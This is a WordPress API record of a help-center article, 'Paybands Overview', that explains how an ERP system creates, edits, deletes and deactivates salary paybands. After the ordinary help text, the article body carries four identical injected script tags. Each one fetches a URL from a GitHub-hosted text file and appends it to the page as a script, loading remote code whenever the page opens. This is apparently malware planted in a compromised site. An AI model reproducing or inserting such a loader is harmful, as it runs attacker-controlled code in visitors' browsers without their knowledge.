{"id":2228,"date":"2019-11-20T15:49:14","date_gmt":"2019-11-20T10:19:14","guid":{"rendered":"https:\/\/helpcenter.nexterp.in\/helpcenter\/?p=2228"},"modified":"2024-12-28T20:51:28","modified_gmt":"2024-12-28T15:21:28","slug":"paybands-overview","status":"publish","type":"post","link":"https:\/\/helpcenter.nexterp.in\/helpcenter\/paybands-overview\/","title":{"rendered":"Paybands Overview"},"content":{"rendered":"<ul>\n<li>Paybands are used to define the range of basic salary given to a different group of staff members.<\/li>\n<li>Basic salary is a mandatory salary component received by staff which should always lie in the range of payband allocated to the staff.<\/li>\n<li>Basic functionality includes 4 features:\n<ol class=\"mt-10\" type=\"circle\">\n<li><strong>Create Payband<\/strong>\n<ol class=\"mt-10\" type=\"square\">\n<li>Payband name and code has to be unique for all the active paybands.<\/li>\n<li>Start and end amount (both being inclusive in the range), would be taken as the upper and lower limit of the range of payband.<\/li>\n<li>All the above fields are mandatory while creating paybands.<\/li>\n<li>Range of multiple paybands (inactive\/active) are allowed to be overlapping with each other.<\/li>\n<li>All the paybands upon creation are by default set to an active state.<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<ol class=\"mt-10\" type=\"square\">\n<li><strong>Edit Payband<\/strong>\n<ol class=\"mt-10\" type=\"circle\">\n<li>For inactive paybands, editing is not allowed.<\/li>\n<li>Payband name and code can be edited for payband in active state, provided it still remains unique.<\/li>\n<li>Editing of start and end amount of an active payband is only allowed until salary register for none of the staff mapped to it is frozen.<\/li>\n<li>Changing start &amp; end amount of a payband, will delete the already created salary structure &amp; register of those staff members, for which, basic salary amount given, doesn&#8217;t lie in the new range of payband.<\/li>\n<li>No editing is allowed for paybands in inactive state.<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<ol class=\"mt-10\" type=\"square\">\n<li><strong>Delete Payband<\/strong>\n<ol class=\"mt-10\" type=\"circle\">\n<li>In order to delete a payband the user has to first unallocate all the staff in that payband.<\/li>\n<li>If salary register of a staff is frozen his\/her payband can&#8217;t be changed and hence such paybands can&#8217;t be deleted.<\/li>\n<li>Once deleted, a payband can&#8217;t be revived, although a new payband with the same name &amp; code can be created.<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<ol class=\"mt-10\" type=\"square\">\n<li><strong>Deactivate Payband<\/strong>\n<ol class=\"mt-10\" type=\"circle\">\n<li>A payband can be deactivated in case the user no longer wants it to be available for mapping of staff.<\/li>\n<li>In order to deactivate a payband the user has to first unallocate all the staff in that payband.<\/li>\n<li>If salary register of a staff is frozen, his\/her payband can&#8217;t be changed and hence such paybands can&#8217;t be deactivated.<\/li>\n<li>The user can however activate any deactivate payband at any given point and allocate staff to it.<\/li>\n<li>For inactive paybands, editing is not allowed.<\/li>\n<li>There can exist a payband in inactive state with the same code &amp; name as that of an active payband.<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n<p><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Paybands are used to define the range of basic salary given to a different group of staff members.
